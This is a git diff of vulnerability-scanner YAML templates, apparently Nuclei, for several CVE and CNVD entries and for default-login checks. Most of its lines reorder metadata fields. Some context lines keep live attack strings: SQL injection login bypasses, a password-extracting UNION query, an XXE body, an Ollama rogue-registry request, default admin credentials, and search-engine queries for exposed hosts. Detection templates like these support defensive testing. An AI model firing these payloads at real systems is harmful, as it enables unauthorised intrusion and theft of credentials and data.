- tags: cnvd,cnvd2020,jsherp,disclosure
-
classification:
cpe: cpe:2.3:a:jishenghua:jsherp:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: jishenghua
+ product: jsherp
+ shodan-query: http.favicon.hash:-1298131932
+ fofa-query: jshERP-boot
+ tags: cnvd,cnvd2020,jsherp,disclosure
+
http:
- method: GET
path:
@@ -40,4 +40,5 @@ http:
- type: status
status:
- 200
-# digest: 490a00463044022001094e317be5b989e3d7461dd099453f1237356ce28affa5ee58239edd6affa502205957345e5569e5b78bc928736bd415c0445ca550661c57cd1e27f9d66d6520a3:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a00463044022001094e317be5b989e3d7461dd099453f1237356ce28affa5ee58239edd6affa502205957345e5569e5b78bc928736bd415c0445ca550661c57cd1e27f9d66d6520a3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cnvd/2021/CNVD-2021-15822.yaml b/http/cnvd/2021/CNVD-2021-15822.yaml
index b9a7a87088..24cfe57a02 100644
--- a/http/cnvd/2021/CNVD-2021-15822.yaml
+++ b/http/cnvd/2021/CNVD-2021-15822.yaml
@@ -8,17 +8,17 @@ info:
ShopXO is an open source enterprise-level open source e-commerce system. ShopXO has an arbitrary file reading vulnerability, which can be used by attackers to obtain sensitive information.
reference:
- https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog
+ classification:
+ cpe: cpe:2.3:a:shopxo:shopxo:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
+ vendor: shopxo
+ product: shopxo
shodan-query: title:"ShopXO企业级B2C电商系统提供商"
fofa-query: app="ShopXO企业级B2C电商系统提供商"
- product: shopxo
- vendor: shopxo
tags: cnvd2021,cnvd,shopxo,lfi
- classification:
- cpe: cpe:2.3:a:shopxo:shopxo:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -35,4 +35,5 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402206735e750a62b437583ca1e1cae33666b4c2ce3b8a8310c3d1212a98fcb018a69022066c8a339f06f76b3df20a5c624b054d356f219e1e77661921c541dc2d7ee4dc5:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402206735e750a62b437583ca1e1cae33666b4c2ce3b8a8310c3d1212a98fcb018a69022066c8a339f06f76b3df20a5c624b054d356f219e1e77661921c541dc2d7ee4dc5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cnvd/2022/CNVD-2022-43245.yaml b/http/cnvd/2022/CNVD-2022-43245.yaml
index 3286cff038..ac32a58e97 100755
--- a/http/cnvd/2022/CNVD-2022-43245.yaml
+++ b/http/cnvd/2022/CNVD-2022-43245.yaml
@@ -6,16 +6,16 @@ info:
severity: high
description: |
e-office is a standard collaborative mobile office platform. Ltd. e-office has an arbitrary file reading vulnerability, which can be exploited by attackers to obtain sensitive information.
+ classification:
+ cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- fofa-query: app="泛微-协同办公OA"
- product: e-office
vendor: weaver
+ product: e-office
+ fofa-query: app="泛微-协同办公OA"
tags: cnvd,cnvd2022,weaver,e-office,oa,lfi
- classification:
- cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -44,4 +44,4 @@ http:
status:
- 200
-# digest: 490a004630440220409f4c0eb8fc6b1d328944400c499675e5df4db2478f76a4855474ade6b0f01c02201cf7cb9d1eac68921863599f86b3360bf2d1c81bfc642de585a9bb41a2b006ff:922c64590222798bb761d5b6d8e72950
+# digest: 490a004630440220409f4c0eb8fc6b1d328944400c499675e5df4db2478f76a4855474ade6b0f01c02201cf7cb9d1eac68921863599f86b3360bf2d1c81bfc642de585a9bb41a2b006ff:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cnvd/2024/CNVD-2024-15077.yaml b/http/cnvd/2024/CNVD-2024-15077.yaml
index 2148afb423..8ea0fc4abc 100644
--- a/http/cnvd/2024/CNVD-2024-15077.yaml
+++ b/http/cnvd/2024/CNVD-2024-15077.yaml
@@ -9,16 +9,16 @@ info:
reference:
- https://github.com/wy876/POC/blob/main/AJ-Report%E5%BC%80%E6%BA%90%E6%95%B0%E6%8D%AE%E5%A4%A7%E5%B1%8F%E5%AD%98%E5%9C%A8%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
- https://github.com/vulhub/vulhub/blob/master/aj-report/CNVD-2024-15077/README.md
+ classification:
+ cpe: cpe:2.3:a:anji-plus:aj-report:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- fofa-query: title="AJ-Report"
- product: aj-report
vendor: anji-plus
+ product: aj-report
+ fofa-query: title="AJ-Report"
tags: cnvd,cnvd2024,aj-report,rce
- classification:
- cpe: cpe:2.3:a:anji-plus:aj-report:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -46,4 +46,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100a0ad6d10ef5ed64fff1a44a4efb42b8c18de347907d77e68fec2a9f796030e8c022003c9c9bcfc6d56d3a3c7988f48874841753487e2ce57d91740ffbe99e3627448:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100a0ad6d10ef5ed64fff1a44a4efb42b8c18de347907d77e68fec2a9f796030e8c022003c9c9bcfc6d56d3a3c7988f48874841753487e2ce57d91740ffbe99e3627448:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-42344.yaml b/http/cves/2023/CVE-2023-42344.yaml
index b9744dd127..270edca2e9 100644
--- a/http/cves/2023/CVE-2023-42344.yaml
+++ b/http/cves/2023/CVE-2023-42344.yaml
@@ -10,28 +10,30 @@ info:
reference:
- https://blog.qualys.com/product-tech/2023/12/08/opencms-unauthenticated-xxe-vulnerability-cve-2023-42344
- https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/
+ classification:
+ cpe: cpe:2.3:a:alkacon:opencms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- fofa-query: "OpenCms-9.5.3"
- product: opencms
vendor: alkacon
+ product: opencms
+ fofa-query: "OpenCms-9.5.3"
tags: cve,cve2023,xxe,opencms
- classification:
- cpe: cpe:2.3:a:alkacon:opencms:*:*:*:*:*:*:*:*
http:
- method: POST
path:
- "{{BaseURL}}/opencms/cmisatom/cmis-online/query"
- "{{BaseURL}}/cmisatom/cmis-online/query"
+
headers:
Content-Type: "application/xml;charset=UTF-8"
Referer: "{{RootURL}}"
+
body: |
]>&test; false false none cmis:none 100 0
-
stop-at-first-match: true
+
matchers-condition: and
matchers:
- type: regex
@@ -40,4 +42,5 @@ http:
- "root:.*:0:0:"
- "invalidArgument"
condition: and
-# digest: 4b0a00483046022100f7dbfd49302b6ff73e5301cdb82e1fea60540cdbacb1e9a04069885d75bbc145022100c7ec2bc827d6116bdc018f12ea636664f6d8688600854967a7d4cc2734c100d4:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100f7dbfd49302b6ff73e5301cdb82e1fea60540cdbacb1e9a04069885d75bbc145022100c7ec2bc827d6116bdc018f12ea636664f6d8688600854967a7d4cc2734c100d4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2024/CVE-2024-27564.yaml b/http/cves/2024/CVE-2024-27564.yaml
index 869e007356..85a99b1c01 100644
--- a/http/cves/2024/CVE-2024-27564.yaml
+++ b/http/cves/2024/CVE-2024-27564.yaml
@@ -9,16 +9,16 @@ info:
reference:
- https://github.com/dirk1983/chatgpt/issues/114
- https://nvd.nist.gov/vuln/detail/CVE-2024-27564
+ classification:
+ cpe: cpe:2.3:a:chanzhaoyu:chatgpt_web:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- fofa-query: "title=\"ChatGPT个人专用版\""
- product: chatgpt_web
vendor: chanzhaoyu
+ product: chatgpt_web
+ fofa-query: "title=\"ChatGPT个人专用版\""
tags: cve,cve2024,chatgpt,ssrf,oast,oos,lfi
- classification:
- cpe: cpe:2.3:a:chanzhaoyu:chatgpt_web:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -42,4 +42,5 @@ http:
- contains(header, "image/jpeg")
- status_code == 200
condition: and
-# digest: 490a0046304402205ae8c7b8e367577b1052683aa4b48d038bc2308c7299d24c0f6530b33b0ac9af022058dcc4c45ed777943b6e87ac9605afbd095f2bad41f6963d208ad6f85e702375:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402205ae8c7b8e367577b1052683aa4b48d038bc2308c7299d24c0f6530b33b0ac9af022058dcc4c45ed777943b6e87ac9605afbd095f2bad41f6963d208ad6f85e702375:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2024/CVE-2024-33288.yaml b/http/cves/2024/CVE-2024-33288.yaml
index 9cb156a0bd..b01393d3dd 100644
--- a/http/cves/2024/CVE-2024-33288.yaml
+++ b/http/cves/2024/CVE-2024-33288.yaml
@@ -9,16 +9,16 @@ info:
reference:
- https://en.0day.today/exploit/39610
- https://www.sourcecodester.com/sql/17287/prison-management-system.html
+ classification:
+ cpe: cpe:2.3:a:prison_management_system_project:prison_management_system:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: title:"Prison Management System"
- product: prison_management_system
vendor: prison_management_system_project
+ product: prison_management_system
+ shodan-query: title:"Prison Management System"
tags: cve,cve2024,cms,sqli
- classification:
- cpe: cpe:2.3:a:prison_management_system_project:prison_management_system:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -27,7 +27,6 @@ http:
Content-Type: application/x-www-form-urlencoded
txtusername=admin%27+or+%271%27+%3D%271&txtpassword={{randstr}}&btnlogin=
-
- |
GET /Admin/index.php HTTP/1.1
Host: {{Hostname}}
@@ -44,4 +43,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100859ec311a5b87c8613179df918539075c5fd10a9d17a0273f0970d74ab5ea0e90221008c39c278e0ce4d1b08af7daa3356e7901998adf7c17a2919323d4a935efff082:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100859ec311a5b87c8613179df918539075c5fd10a9d17a0273f0970d74ab5ea0e90221008c39c278e0ce4d1b08af7daa3356e7901998adf7c17a2919323d4a935efff082:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2024/CVE-2024-34982.yaml b/http/cves/2024/CVE-2024-34982.yaml
index 604a8996da..3bb2ec20d3 100644
--- a/http/cves/2024/CVE-2024-34982.yaml
+++ b/http/cves/2024/CVE-2024-34982.yaml
@@ -10,18 +10,16 @@ info:
- https://github.com/n2ryx/CVE/blob/main/Lylme_pagev1.9.5.md
- https://github.com/tanjiti/sec_profile
- https://github.com/ATonysan/poc-exp/blob/main/60NavigationPage_CVE-2024-34982_ArbitraryFileUploads.py
+ classification:
+ cpe: cpe:2.3:a:lylme:lylme_spage:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- fofa-query: icon_hash="-282504889"
- product: lylme_spage
vendor: lylme
+ product: lylme_spage
+ fofa-query: icon_hash="-282504889"
tags: cve,cve2024,lylme-spage,rce,intrusive
-
- classification:
- cpe: cpe:2.3:a:lylme:lylme_spage:*:*:*:*:*:*:*:*
flow: http(1) && http(2)
-
variables:
string: "{{randstr}}"
filename: "{{to_lower(rand_text_alpha(5))}}"
@@ -73,4 +71,5 @@ http:
- 'contains(body, "{{string}}" )'
- 'contains(header, "text/html")'
condition: and
-# digest: 4a0a004730450220440784f1e1d309bfb1eee99fbcaf02afe7bfa185b48f07233df0f14cac9e9d9b0221009072b53098bb58d0d3efd14db1a3fc5f7b0b4593a0426fa060db0c42edd6f029:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a004730450220440784f1e1d309bfb1eee99fbcaf02afe7bfa185b48f07233df0f14cac9e9d9b0221009072b53098bb58d0d3efd14db1a3fc5f7b0b4593a0426fa060db0c42edd6f029:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2024/CVE-2024-3552.yaml b/http/cves/2024/CVE-2024-3552.yaml
index 3428af8a7a..c678dc903c 100644
--- a/http/cves/2024/CVE-2024-3552.yaml
+++ b/http/cves/2024/CVE-2024-3552.yaml
@@ -10,20 +10,18 @@ info:
reference:
- https://vulners.com/wpvulndb/CVE-2024-3552
- https://wpscan.com/vulnerability/34b03ee4-de81-4fec-9f3d-e1bd5b94d136/
+ classification:
+ cpe: cpe:2.3:a:salephpscripts:web_directory_free:*:*:*:*:wordpress:*:*:*
metadata:
verified: true
max-request: 1
- publicwww-query: "/wp-content/plugins/web-directory-free"
- product: web_directory_free
vendor: salephpscripts
+ product: web_directory_free
+ publicwww-query: "/wp-content/plugins/web-directory-free"
tags: cve,cve2024,wordpress,wp-plugin,wpscan,wp,web-directory-free
-
- classification:
- cpe: cpe:2.3:a:salephpscripts:web_directory_free:*:*:*:*:wordpress:*:*:*
flow: http(1) && http(2)
http:
-
- raw:
- |
GET / HTTP/1.1
@@ -51,4 +49,5 @@ http:
- 'status_code == 200'
- regex('^\[\]$', body)
condition: and
-# digest: 4a0a0047304502205f1531596b6325ac2d986cd6245136e53aa97e8a3978b6a394bffeb78042691602210093b20af969ed64d70d37d6bcea2a4ea4e185ec3d9814c49ec0e4ed34262d6ba6:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502205f1531596b6325ac2d986cd6245136e53aa97e8a3978b6a394bffeb78042691602210093b20af969ed64d70d37d6bcea2a4ea4e185ec3d9814c49ec0e4ed34262d6ba6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2024/CVE-2024-36837.yaml b/http/cves/2024/CVE-2024-36837.yaml
index 85a5d0386f..246defe82a 100644
--- a/http/cves/2024/CVE-2024-36837.yaml
+++ b/http/cves/2024/CVE-2024-36837.yaml
@@ -9,16 +9,15 @@ info:
reference:
- https://github.com/phtcloud-dev/CVE-2024-36837
- https://nvd.nist.gov/vuln/detail/CVE-2024-36837
+ classification:
+ cpe: cpe:2.3:a:crmeb:crmeb:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- fofa-query: title="CRMEB"
- product: crmeb
vendor: crmeb
+ product: crmeb
+ fofa-query: title="CRMEB"
tags: cve,cve2024,crmeb,sqli
-
- classification:
- cpe: cpe:2.3:a:crmeb:crmeb:*:*:*:*:*:*:*:*
variables:
num: "{{rand_int(9000000, 9999999)}}"
@@ -44,4 +43,5 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402203044d17d81b224dafab0f052edc09852ae126401a2350dcbed817e3a8d32b6840220266a399dff53e7dd81a0eeea14d4f29ab5039fee825cd84700698d76b30c8e7f:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402203044d17d81b224dafab0f052edc09852ae126401a2350dcbed817e3a8d32b6840220266a399dff53e7dd81a0eeea14d4f29ab5039fee825cd84700698d76b30c8e7f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2024/CVE-2024-37032.yaml b/http/cves/2024/CVE-2024-37032.yaml
index 02b3acd935..3f57420cc9 100644
--- a/http/cves/2024/CVE-2024-37032.yaml
+++ b/http/cves/2024/CVE-2024-37032.yaml
@@ -10,16 +10,16 @@ info:
- https://www.wiz.io/blog/probllama-ollama-vulnerability-cve-2024-37032
- https://nvd.nist.gov/vuln/detail/CVE-2024-37032
- https://github.com/Bi0x/CVE-2024-37032
+ classification:
+ cpe: cpe:2.3:a:ollama:ollama:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: ollama
- product: ollama
vendor: ollama
+ product: ollama
+ shodan-query: ollama
tags: cve,cve2024,ollama,rce
- classification:
- cpe: cpe:2.3:a:ollama:ollama:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -28,7 +28,6 @@ http:
Content-Type: application/json
{"name": "http://{{interactsh-url}}/rogue/{{randstr}}", "insecure": true}
-
- |
POST /api/push HTTP/1.1
Host: {{Hostname}}
@@ -42,4 +41,5 @@ http:
- contains(interactsh_protocol, 'http')
- contains_all(header, 'application/x-ndjson') && contains(body_2, 'retrieving manifest')
condition: and
-# digest: 4a0a00473045022100a5fa33a756b90484a6e38030d236f0441e68f5e0568a583ecbce5ccc179ec12e022067ed5562eb8a263a887821208641b1c7337d73b10359302495c184e4d1145db2:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100a5fa33a756b90484a6e38030d236f0441e68f5e0568a583ecbce5ccc179ec12e022067ed5562eb8a263a887821208641b1c7337d73b10359302495c184e4d1145db2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2024/CVE-2024-37152.yaml b/http/cves/2024/CVE-2024-37152.yaml
index 4cc612cff9..9cc4efb619 100644
--- a/http/cves/2024/CVE-2024-37152.yaml
+++ b/http/cves/2024/CVE-2024-37152.yaml
@@ -9,16 +9,16 @@ info:
reference:
- https://github.com/argoproj/argo-cd/security/advisories/GHSA-87p9-x75h-p4j2
- https://nvd.nist.gov/vuln/detail/CVE-2024-37152
+ classification:
+ cpe: cpe:2.3:a:argoproj:argo_cd:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"Argo CD"
- product: argo_cd
vendor: argoproj
+ product: argo_cd
+ shodan-query: html:"Argo CD"
tags: cve,cve2024,argo-cd,info-leak
- classification:
- cpe: cpe:2.3:a:argoproj:argo_cd:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -42,4 +42,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100ff51e4d4de0176d7b75272c7382661952fa7f28124b1a6113d2d52675ba7d7ca022100dc729bfc997db746bf206fe0a1ae9ef36b3af92ebad27d690c90a41b636944aa:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100ff51e4d4de0176d7b75272c7382661952fa7f28124b1a6113d2d52675ba7d7ca022100dc729bfc997db746bf206fe0a1ae9ef36b3af92ebad27d690c90a41b636944aa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2024/CVE-2024-38289.yaml b/http/cves/2024/CVE-2024-38289.yaml
index 0884307817..7b70fa4203 100644
--- a/http/cves/2024/CVE-2024-38289.yaml
+++ b/http/cves/2024/CVE-2024-38289.yaml
@@ -8,16 +8,16 @@ info:
A Boolean-based SQL injection vulnerability in the "RHUB TurboMeeting" web application. This vulnerability could allow an attacker to execute arbitrary SQL commands on the database server, potentially allowing them to access sensitive data or compromise the server.
reference:
- https://github.com/google/security-research/security/advisories/GHSA-vx5j-8pgx-v42v
+ classification:
+ cpe: cpe:2.3:a:rhubcom:turbomeeting:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: html:"TurboMeeting"
- product: turbomeeting
vendor: rhubcom
+ product: turbomeeting
+ shodan-query: html:"TurboMeeting"
tags: cve,cve2024,sqli,turbomeeting
- classification:
- cpe: cpe:2.3:a:rhubcom:turbomeeting:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -26,7 +26,6 @@ http:
Content-Type: application/x-www-form-urlencoded
meeting_id=1'/**/OR/**/1=1/**/UNION/**/select/**/password/**/from/**/employee/**/where/**/email='admin'/**/AND/**/substr(password,2,1)='b'/**
-
- |
POST /as/wapi/vmp HTTP/1.1
Host: {{Hostname}}
@@ -45,4 +44,5 @@ http:
part: body_2
words:
- '<__Status__>FAILED'
-# digest: 490a0046304402200529dc5c8778e012e9cbb7ffa30d733dc1c0587b432825bef1f5231c3e8986c30220102ab38598176c7395f39eb02a1ab74dc442f237b847feb8dc497b297446afa6:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402200529dc5c8778e012e9cbb7ffa30d733dc1c0587b432825bef1f5231c3e8986c30220102ab38598176c7395f39eb02a1ab74dc442f237b847feb8dc497b297446afa6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2024/CVE-2024-3922.yaml b/http/cves/2024/CVE-2024-3922.yaml
index 85c348beff..d47f610520 100644
--- a/http/cves/2024/CVE-2024-3922.yaml
+++ b/http/cves/2024/CVE-2024-3922.yaml
@@ -13,16 +13,15 @@ info:
reference:
- https://dokan.co/docs/wordpress/changelog/
- https://nvd.nist.gov/vuln/detail/CVE-2024-3922
+ classification:
+ cpe: cpe:2.3:a:wedevs:dokan:*:*:*:*:wordpress:*:*:*
metadata:
verified: true
max-request: 2
- publicwww-query: "/wp-content/plugins/dokan-pro/"
- product: dokan
vendor: wedevs
+ product: dokan
+ publicwww-query: "/wp-content/plugins/dokan-pro/"
tags: cve,cve2024,dokan,wp-plugin,wordpress,wp,dokan-pro,sqli
-
- classification:
- cpe: cpe:2.3:a:wedevs:dokan:*:*:*:*:wordpress:*:*:*
flow: http(1) && http(2)
http:
@@ -51,4 +50,5 @@ http:
- 'duration>=6'
- 'status_code == 302'
condition: and
-# digest: 4a0a00473045022100dddd0ec4841ea543e8407a98030b788b48c7c9ed9dd3effa76716f9339223b8a022076cb03daa28b52dab09d0014ed45363b0db7d14951be1ec39218c42cc49ee34f:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100dddd0ec4841ea543e8407a98030b788b48c7c9ed9dd3effa76716f9339223b8a022076cb03daa28b52dab09d0014ed45363b0db7d14951be1ec39218c42cc49ee34f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2024/CVE-2024-6781.yaml b/http/cves/2024/CVE-2024-6781.yaml
index 0ccb7dc58d..d2fde01514 100644
--- a/http/cves/2024/CVE-2024-6781.yaml
+++ b/http/cves/2024/CVE-2024-6781.yaml
@@ -8,17 +8,17 @@ info:
Arbitrary file read via Calibre’s content server in Calibre <= 7.14.0.
reference:
- https://starlabs.sg/advisories/24/24-6781/
- metadata:
- shodan-query: html:"Calibre"
- fofa-query: "Server: calibre"
- verified: true
- max-requeset: 1
- product: calibre
- vendor: calibre-ebook
- tags: cve,cve2024,calibre,lfi
-
classification:
cpe: cpe:2.3:a:calibre-ebook:calibre:*:*:*:*:*:*:*:*
+ metadata:
+ verified: true
+ vendor: calibre-ebook
+ product: calibre
+ shodan-query: html:"Calibre"
+ fofa-query: "Server: calibre"
+ max-requeset: 1
+ tags: cve,cve2024,calibre,lfi
+
http:
- raw:
- |
@@ -57,4 +57,5 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402202ca6fce004009bb7f0650dea15c513da500a417c0c88ac7b0e5e45f237a4e7db022076d6e09297483225abdcab453844dd78e248409367b78b3e4b02e80034988c3d:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402202ca6fce004009bb7f0650dea15c513da500a417c0c88ac7b0e5e45f237a4e7db022076d6e09297483225abdcab453844dd78e248409367b78b3e4b02e80034988c3d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2024/CVE-2024-6782.yaml b/http/cves/2024/CVE-2024-6782.yaml
index 8b64b13d41..3ca2e59c62 100644
--- a/http/cves/2024/CVE-2024-6782.yaml
+++ b/http/cves/2024/CVE-2024-6782.yaml
@@ -8,17 +8,17 @@ info:
Unauthenticated remote code execution via Calibre’s content server in Calibre <= 7.14.0.
reference:
- https://starlabs.sg/advisories/24/24-6781/
+ classification:
+ cpe: cpe:2.3:a:calibre-ebook:calibre:*:*:*:*:*:*:*:*
metadata:
verified: true
+ vendor: calibre-ebook
+ product: calibre
shodan-query: html:"Calibre"
fofa-query: "Server: calibre"
max-requeset: 1
- product: calibre
- vendor: calibre-ebook
tags: cve,cve2024,calibre,rce
- classification:
- cpe: cpe:2.3:a:calibre-ebook:calibre:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -63,4 +63,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100ab0c6eb74bbcbd25752d1cb038e1250aae3a1ca7939f89b55c54300ce331fb7f022100e4d96a62a8a103243f43549987b0cbd496172100fa325a425975b072d0482332:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100ab0c6eb74bbcbd25752d1cb038e1250aae3a1ca7939f89b55c54300ce331fb7f022100e4d96a62a8a103243f43549987b0cbd496172100fa325a425975b072d0482332:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2024/CVE-2024-6922.yaml b/http/cves/2024/CVE-2024-6922.yaml
index f8757c6580..59a01b5a9b 100644
--- a/http/cves/2024/CVE-2024-6922.yaml
+++ b/http/cves/2024/CVE-2024-6922.yaml
@@ -12,6 +12,8 @@ info:
- https://www.automationanywhere.com/products/automation-360
- https://www.rapid7.com/blog/post/2024/07/26/cve-2024-6922-automation-anywhere-automation-360-server-side-request-forgery/
- https://nvd.nist.gov/vuln/detail/CVE-2024-6922
+ classification:
+ cpe: cpe:2.3:a:automationanywhere:automation_360:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
@@ -21,8 +23,7 @@ info:
vendor: automationanywhere
tags: cve,cve2024,ssrf,oast,automation,anywhere
- classification:
- cpe: cpe:2.3:a:automationanywhere:automation_360:*:*:*:*:*:*:*:*
+
http:
- raw:
- |
diff --git a/http/default-logins/apache/apache-apollo-default-login.yaml b/http/default-logins/apache/apache-apollo-default-login.yaml
index 63d0f61a53..4ee04c98cf 100644
--- a/http/default-logins/apache/apache-apollo-default-login.yaml
+++ b/http/default-logins/apache/apache-apollo-default-login.yaml
@@ -4,16 +4,15 @@ info:
name: Apache Apollo - Default Login
author: ritikchaddha
severity: high
+ classification:
+ cpe: cpe:2.3:a:apache:activemq_apollo:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Apache Apollo"
- product: activemq_apollo
vendor: apache
+ product: activemq_apollo
+ shodan-query: title:"Apache Apollo"
tags: apache,apollo,default-login,misconfig
-
- classification:
- cpe: cpe:2.3:a:apache:activemq_apollo:*:*:*:*:*:*:*:*
variables:
username: 'admin'
password: 'admin'
@@ -26,7 +25,6 @@ http:
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
username={{username}}&password={{password}}
-
- |
GET /console/index.html HTTP/1.1
Host: {{Hostname}}
@@ -49,4 +47,5 @@ http:
- type: status
status:
- 200
-# digest: 490a004630440220316d56568350165547ed1cb488565e14ecae67a775aea47af5d671124b563a5b022040877ad8cc3beae83a8717a9b7d014c5216d3b5acabd097d97d2cdeea26ee151:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a004630440220316d56568350165547ed1cb488565e14ecae67a775aea47af5d671124b563a5b022040877ad8cc3beae83a8717a9b7d014c5216d3b5acabd097d97d2cdeea26ee151:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/default-logins/apache/cloudstack-default-login.yaml b/http/default-logins/apache/cloudstack-default-login.yaml
index 26110de641..726e1abcea 100644
--- a/http/default-logins/apache/cloudstack-default-login.yaml
+++ b/http/default-logins/apache/cloudstack-default-login.yaml
@@ -6,16 +6,16 @@ info:
severity: high
description: |
CloudStack instance discovered using weak default credentials, allows the attacker to gain admin privilege.
+ classification:
+ cpe: cpe:2.3:a:apache:cloudstack:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.title:"Apache CloudStack"
- product: cloudstack
vendor: apache
+ product: cloudstack
+ shodan-query: http.title:"Apache CloudStack"
tags: default-login,apache,cloudstack
- classification:
- cpe: cpe:2.3:a:apache:cloudstack:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -27,13 +27,11 @@ http:
command=login&username={{username}}&password={{password}}&domain=%2F&response=json
attack: pitchfork
-
payloads:
username:
- admin
password:
- password
-
host-redirects: true
matchers:
- type: dsl
@@ -42,4 +40,5 @@ http:
- "contains(content_type, 'application/json')"
- "contains_all(body, 'sessionkey','domainid','userid')"
condition: and
-# digest: 4a0a00473045022100e14781f645e94e9addfd689f626c0fd7410a4c6abab76c419506a12a7e77b3c702203e536f8fc02f29d3744e77e3403890bbb63998656b7582421280bb32f31466a9:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100e14781f645e94e9addfd689f626c0fd7410a4c6abab76c419506a12a7e77b3c702203e536f8fc02f29d3744e77e3403890bbb63998656b7582421280bb32f31466a9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/default-logins/apache/kylin-default-login.yaml b/http/default-logins/apache/kylin-default-login.yaml
index 1a8d093ee8..f4a2d89c87 100644
--- a/http/default-logins/apache/kylin-default-login.yaml
+++ b/http/default-logins/apache/kylin-default-login.yaml
@@ -9,16 +9,16 @@ info:
reference:
- https://github.com/hanc00l/pocGoby2Xray/blob/main/xraypoc/Apache_Kylin_Console_Default_password.yml
- https://github.com/Wker666/Demo/blob/main/script/%E6%BC%8F%E6%B4%9E%E6%8E%A2%E6%B5%8B/Kylin/Apache%20Kylin%20Console%20%E6%8E%A7%E5%88%B6%E5%8F%B0%E5%BC%B1%E5%8F%A3%E4%BB%A4.wker
+ classification:
+ cpe: cpe:2.3:a:apache:kylin:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 6
- fofa-query: app="APACHE-kylin"
- product: kylin
vendor: apache
+ product: kylin
+ fofa-query: app="APACHE-kylin"
tags: kylin,default-login,apache
- classification:
- cpe: cpe:2.3:a:apache:kylin:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -56,4 +56,4 @@ http:
status:
- 200
-# digest: 490a0046304402201fcf0b913c72b187052e4b5e7871e7d0e5b5df5339bb686cba1d688f6b12ab5702201e25e7c9eaedcea9be02d16d4759ab89f87e1bbd505c6144f94e671bc2b25db0:922c64590222798bb761d5b6d8e72950
